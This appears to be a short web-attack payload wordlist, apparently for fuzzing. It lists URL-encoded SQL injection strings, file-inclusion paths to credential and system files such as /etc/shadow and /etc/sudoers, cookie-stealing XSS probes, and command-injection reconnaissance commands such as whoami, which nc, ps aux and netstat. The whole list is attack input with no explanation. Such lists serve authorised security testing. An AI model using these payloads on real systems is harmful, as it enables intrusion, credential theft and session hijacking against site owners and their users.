'or%20'1'='1
'or%20'1'='1--
'or%20'1'='1--%20'--
--'or%20'1'='1%20'--
--'or%20'1'='1--%20'--
/proc/version
/etc/issue
/etc/passwd
/etc/shadow
/etc/group
/etc/profile
/etc/crontab
/etc/sudoers
/var/log/apache2/access.log
alert('xss');
alert(document.cookie);
<script>alert('xss');</script>
<script>alert(document.cookie);</script>
uname%20-a
whoami
id
groups
env
echo%20$PATH
crontab%20-l
ls
ls%20-alh%20/etc/shadow
ls%20-alh%20/etc/passwd
ls%20-alh%20/etc/group
ls%20-alh%20/etc/profile
which%20python
which%20nc
which%20wget
which%20gcc
ps%20aux
ps%20aux%20|%20grep%20root
netstat%20-antp
netstat%20-tunlp
